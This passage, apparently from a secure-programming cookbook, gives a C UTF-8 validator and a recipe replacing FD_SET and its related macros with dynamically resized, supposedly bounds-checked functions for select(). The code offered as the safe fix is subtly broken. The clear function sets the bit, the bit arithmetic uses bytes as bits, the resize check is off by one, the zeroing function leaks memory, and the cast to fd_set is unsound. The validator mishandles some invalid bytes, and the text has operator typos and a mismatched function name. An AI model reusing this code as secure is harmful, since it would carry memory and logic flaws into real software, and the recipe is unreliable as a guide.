The following spc_utf8_isvalid( ) function will scan a string encoded in UTF-8 to verify that it contains only valid sequences. It will return 1 if the string contains only legitimate encoding sequences; otherwise, it will return 0.

int spc_utf8_isvalid(const unsigned char *input) {

int nb;

const unsigned char *c = input;

for (c = input; *c; c += (nb + 1)) {

if (!(*c & 0x80)) nb = 0;

else if ((*c & 0xc0) = = 0x80) return 0;

else if ((*c & 0xe0) = = 0xc0) nb = 1;

else if ((*c & 0xf0) = = 0xe0) nb = 2;

else if ((*c & 0xf8) = = 0xf0) nb = 3;

else if ((*c & 0xfc) = = 0xf8) nb = 4;

else if ((*c & 0xfe) = = 0xfc) nb = 5;

while (nb-- > 0)

if ((*(c + nb) & 0xc0) != 0x80) return 0;

}

return 1;

}

3.13. Preventing File Descriptor Overflows When Using select( )

Problem

Your program uses the select( ) system call to determine when sockets are ready for writing, have data waiting to be read, or have an exceptional condition (e.g., out-of-band data has arrived). Using select( ) requires the use of the fd_set data type, which typically entails the use of the FD_*( ) family of macros. In most implementations, FD_SET( ) and FD_CLR( ), in particular, are susceptible to an array overrun.

Solution

Do not use the FD_*( ) family of macros. Instead, use the macros that are provided in this recipe. The FD_SET( ) and FD_CLR( ) macros will modify an fd_set object without performing any bounds checking. The macros we provide will do proper bounds checking.

Discussion

The select( ) system call is normally used to multiplex sockets. In a single-threaded environment, select( ) allows you to build sets of socket descriptors for which you wish to wait for data to become available or that you wish to have available to write data to. The fd_set data type is used to hold a list of the socket descriptors, and several standard macros are used to manipulate objects of this type.

Normally, fd_set is defined as a structure with a single member that is a statically allocated array of long integers. Because socket descriptors are always numbered starting with 0 and ending with the highest allowable descriptor, the array of integers in an fd_set is actually treated as a bitmask with a one-to-one correspondence between bits and socket descriptors.

The size of the array in the fd_set structure is determined by the FD_SETSIZE macro. Most often, the size of the array is sufficiently large to be able to handle any possible file descriptor, but the problem is that most implementations of the FD_SET( ) and FD_CLR( ) macros (which are used to set and clear socket descriptors in an fd_set object) do not perform any bounds checking and will happily overrun the array if asked to do so.

If FD_SETSIZE is defined to be sufficiently large, why is this a problem? Consider the situation in which a server program is compiled with FD_SETSIZE defined to be 256, which is normally the maximum number of file and socket descriptors allowed in a Unix process. Everything works just fine for a while, but eventually the number of allowed file descriptors is increased to 512 because 256 are no longer enough for all the connections to the server. The increase in file descriptors could be done externally by using setrlimit( ) before starting the server process (with the bash shell, the command would be ulimit -n 512).

The proper way to deal with this problem is to allocate the array dynamically and ensure that FD_SET( ) and FD_CLR( ) resize the array as necessary before modifying it. Unfortunately, to do this, we need to create a new data type. We define the data type such that it can be safely cast to anfd_set for passing it directly to select( ):

#include <stdlib.h>

typedef struct {

long int *fds_bits;

size_t fds_size;

} SPC_FD_SET;

With a new data type defined, we can replace FD_SET( ), FD_CLR( ), FD_ISSET( ), and FD_ZERO( ), which are normally implemented as preprocessor macros. Instead, we will implement them as functions because we need to do a little extra work, and it also helps ensure type safety:

void spc_fd_zero(SPC_FD_SET *fdset) {

fdset->fds_bits = 0;

fdset->fds_size = 0;

}

void spc_fd_set(int fd, SPC_FD_SET *fdset) {

long *tmp_bits;

size_t new_size;

if (fd < 0) return;

if (fd > fdset->fds_size) {

new_size = sizeof(long) * ((fd + sizeof(long) - 1) / sizeof(long));

if (!(tmp_bits = (long *)realloc(fdset->fds_bits, new_size))) return;

fdset->fds_bits = tmp_bits;

fdset->fds_size = new_size;

}

fdset->fds_bits[fd / sizeof(long)] |= (1 << (fd % sizeof(long)));

}

void spc_fd_clr(int fd, SPC_FD_SET *fdset) {

long *tmp_bits;

size_t new_size;

if (fd < 0) return;

if (fd > fdset->fds_size) {

new_size = sizeof(long) * ((fd + sizeof(long) - 1) / sizeof(long));

if (!(tmp_bits = (long *)realloc(fdset->fds_bits, new_size))) return;

fdset->fds_bits = tmp_bits;

fdset->fds_size = new_size;

}

fdset->fds_bits[fd / sizeof(long)] |= (1 << (fd % sizeof(long)));

}

int spc_fd_isset(int fd, SPC_FD_SET *fdset) {

if (fd < 0 || fd >= fdset->fds_size) return 0;

return (fdset->fds_bits[fd / sizeof(long)] & (1 << (fd % sizeof(long))));

}

void spc_fd_free(SPC_FD_SET *fdset) {

if (fdset->fds_bits) free(fdset->fds_bits);

}

int spc_fd_setsize(SPC_FD_SET *fdset) {

return fdset->fds_size;

}

Notice that we've added two additional functions, spc_fd_free( ) and spc_fd_setsize( ) . Because we are now dynamically allocating the array, there must be some way to free it. The function spc_fd_free( ) will only free the inner contents of the SPC_FD_SET object passed to it, leaving management of the SPC_FD_SET object up to you—you may allocate these objects either statically or dynamically. The other function, spc_fd_setsize( ), is a replacement for the FD_SETSIZE macro that is normally used as the first argument to select( ), indicating the size of the FD_SET objects passed as the next three arguments.

Finally, using the new code requires some minor changes to existing code that uses the standard fd_set. Consider the following code example, where the variable client_count is a global variable that represents the number of connected clients, and the variable client_fds is a global variable that is an array of socket descriptors for each connected client:

void main_server_loop(int server_fd) {

int i;

fd_set read_mask;

for (;;) {

FD_ZERO(&read_mask);

FD_SET(server_fd, &read_mask);

for (i = 0; i < client_count; i++) FD_SET(client_fds[i], &read_mask);

select(FD_SETSIZE, &read_mask, 0, 0, 0);

if (FD_ISSET(server_fd, &read_mask)) {

/* Do something with the server_fd such as call accept( ) */

}

for (i = 0; i < client_count; i++)

if (FD_ISSET(client_fds[i], &read_mask)) {

/* Read some data from the client's socket descriptor */

}

}

}

}

The equivalent code using the SPC_FD_SET data type and the functions that operate on it would be:

void main_server_loop(int server_fd) {

int i;

SPC_FD_SET read_mask;

for (;;) {

spc_fd_zero(&read_mask);

spc_fd_set(server_fd, &read_mask);

for (i = 0; i < client_count; i++) spc_fd_set(client_fds[i], &read_mask);

select(spc_fd_size(&read_mask), (fd_set *)&read_mask, 0, 0, 0);

if (spc_fd_isset(server_fd, &read_mask)) {

/* Do something with the server_fd such as call accept( ) */

}

for (i = 0; i < client_count; i++)

if (spc_fd_isset(client_fds[i], &read_mask)) {

/* Read some data from the client's socket descriptor */

}

spc_fd_free(&read_mask);

}

}

As you can see, the code that uses SPC_FD_SET is not all that different from the code that uses fd_set. Naming issues aside, the only real differences are the need to cast the SPC_FD_SET object to an fd_set object, and to call spc_fd_free( ).

See Also

Recipe 3.3